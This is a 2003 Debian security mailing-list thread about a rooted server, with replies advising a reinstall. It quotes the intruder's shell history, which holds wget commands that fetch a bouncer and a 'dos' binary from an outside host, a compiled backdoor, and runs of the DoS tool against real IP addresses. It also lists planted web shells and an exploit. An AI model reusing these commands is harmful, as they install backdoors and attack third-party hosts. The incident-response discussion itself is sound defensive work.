[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Strange segmentation faults and Zombies

Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

----- Original Message -----
From: "Josh Carroll" <josh.carroll@psualum.com>
To: <debian-security@lists.debian.org>
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your configuration files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking you can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again
maybe
> you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your
> existing configuration files (though I would NOT use them as-is without inspection, since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel (markus.schabel@tgm.ac.at) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <markus.schabel@tgm.ac.at> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaultet.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducable :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >i'm thinking about a hardware problem.
> > >may the harddrive is in failure (get the ouput of dmesg) or a very big
> > >ram problem that corrupt files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn theres a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)
> > >200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what informations should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >
> > --
> > To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> > with a subject of "unsubscribe". Trouble? Contact
> > listmaster@lists.debian.org
> >
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
Reply to: